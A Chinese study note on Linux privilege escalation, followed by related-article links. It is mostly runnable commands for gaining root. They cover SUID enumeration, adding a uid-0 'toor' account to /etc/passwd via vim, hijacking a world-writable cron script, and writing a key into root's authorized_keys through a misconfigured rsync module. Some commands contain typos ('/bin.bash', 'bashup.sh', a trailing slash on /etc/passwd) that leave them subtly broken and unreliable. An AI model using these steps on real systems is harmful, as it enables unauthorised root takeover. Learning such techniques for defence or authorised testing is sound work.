【学习笔记】常见的提权方式
提权:linux 内核提权 配置错误提权(用dirtycow提权)
windows 系统漏洞提权
msf
前提:已经通过nc -lvv 监听
find /usr/bin -perm -us=s usid权限文件查询
ls -la /usr/bin/passwd
看到-rwsr-xr-x 1 说明存在suid位
如何提权?用vim.basic提权(可以编辑root才能运行的文件)
然后用python -c 'import pty;pty.spawn("/bin/bash")' 交互式shell
vim /etc/passwd/
编辑格式:用户名:密码:uid:cid:注释:home目录:用户shell
然后退出vim :q!
openssl passwd -1 -salt asd 123 (生成带盐asd密码为123)
vim /etc/passwd
toor:这里复制密码:0:0:注释:/:/bin/sh
:wq! 强制写入
su toor
#id 查看权限
#exit
#crontab -
suid权限
a文件是root权限所属文件 且设置了suid权限 其他用户执行这个文件会以root用户权限执行
赋予suid权限:chmod +s 文件名
执行:sudo -su 用户名 文件名(看到root权限)
linux脏牛
寻找777权限的uid文件(即所有用户可以操作,修改这个文件,利用这个文件的内容进行提权)
ps au 查看所有进程(看到cron就是计划任务进程,然后看到/tmp/backup.sh任务脚本)
ls -la /tmp/backup.sh 查看文件的权限 (-rwxrwxrwx是777文件 r=4 w=2 x=1)
cd /tmp
cp backup.sh a.sh (备份bash.sh)
echo '#!/bin/bash' > backup.sh (一个>是覆盖原来的内容 两个>>是在尾部写入)
echo 'echo“密码”>> /etc/passwd' >> bashup.sh
cat /etc/passwd 看下是否成功写入
请求一个交互shell
su toor
#crontab -l 看下用户的计划任务
风险配置
利用系统错误配置提权
ps -ef (看到有开启rsync服务)
cat /etc/rsyncd.conf 看到rsync的配置文件
发现【files】中path=/ uid=root gid=root read only=no 意味着我们能用root权限查看根目录下所有文件
rsync 127.0.0.1::
rsync 127.0.0.1::文件名
cd /tmp
rm key*(生成公私钥)
ssh-keygen
ls -la(看到key的内容key和key.pub)
在linux下 如果我们的公钥出现在/root/.ssh/authorized_keys下 就可以用私钥登录了
rsync key.pub localhost::files/root/.ssh/authorized_keys
python -c 'import pty;pty.spawn("/bin.bash")'
ssh localhost -lroot -i key(这里私钥位置)
id 看用户权限
【学习笔记】常见的提权方式相关推荐
- 学习笔记_使用二进制的方式修改图片
学习笔记_使用二进制的方式修改图片 1.学习目标 2.学习工具 3.开始操作 3.1 了解图片是怎样用二进制表示的 3.2 开始操作 4.参考文档 1.学习目标 掌握使用二进制的方式修改图片 了解BM ...
- [网络安全学习篇65]:提权
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足:对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以 ...
- mybatis学习笔记--常见的错误
原文来自:<mybatis学习笔记--常见的错误> 昨天刚学了下mybatis,用的是3.2.2的版本,在使用过程中遇到了些小问题,现总结如下,会不断更新. 1.没有在configurat ...
- 一文带你掌握OBS的两种常见的鉴权方式
OBS提供了REST(Representational State Transfer)风格API,支持您通过HTTP/HTTPS请求调用.在调用OBS的API前,需要了解OBS的鉴权认证方式.本文就将 ...
- mysql提权方式linux_Linux提权的几种常用方式
本文转载自微信公众号「Bypass」,作者Bypass .转载本文请联系Bypass公众号. 在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行 ...
- 利用mysql的几种提权方式
利用mysql的几种提权方式 mof提权 1.原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以sy ...
- TS学习笔记04 JS创建对象的方式
TS学习笔记04 JS创建对象的方式 首先我们回顾下JS中创建对象的方式 比如说我按照下面的创建了两个对象分别为stu1和stu2,比如说我现在想给这两个对象都添加一个新的方法,但是这两个对象 ...
- shell将报错信息写到mysql_利用mysql的几种提权方式
利用mysql的几种提权方式 mof提权 1.原理 在windows平台下,c:/windows/system32/wbem/mof/nullevt.mof这个文件会每间隔一段时间(很短暂)就会以sy ...
- Seo:入门须知(八)外链提权方式
外链提权方式 新站 收录率80%引蜘蛛给发布的文章 www.xxx.com/news/1.html 1-3过程 1.针对性的发布文章链接 2.针对有用的内页去发布外链(聚合页和重要的文章页) 3.针对 ...
最新文章
- 记录一次java项目上线部署
- pytorch C++部署模型 ONNX tensorRT
- ubuntu14.04,安装JDK1.8(JAVA程序需要的开发、运行环境)
- boost::scoped_thread相关的测试程序
- Shell入门(一)之简介
- 前端学习(2448):发布文章功能介绍
- Xamarin.Android开发音乐播放器
- 关于SpringBoot场景启动器
- 一些需要烂熟于心的代码
- 点云与图像融合的深度学习方法综述
- 下载地址部落冲突(Clash Of Clans)免费获取宝石
- 用 360 随身 WiFi 钓鱼
- 余承东 鸿蒙不是手机,余承东解密华为鸿蒙OS2.0:不是手机操作系统的简单替代-社会-文章-小虾米...
- 定时任务ScheduledExecutorService
- 史上最经典的10大反间计
- 解决cdt.causality.graph.GES()报错的问题
- 《刻意练习》--读后感1
- 如何防止失眠——学习笔记
- php保存微信用户头像到本地或者服务器的完美方案!
- flink maven依赖自用(项目用)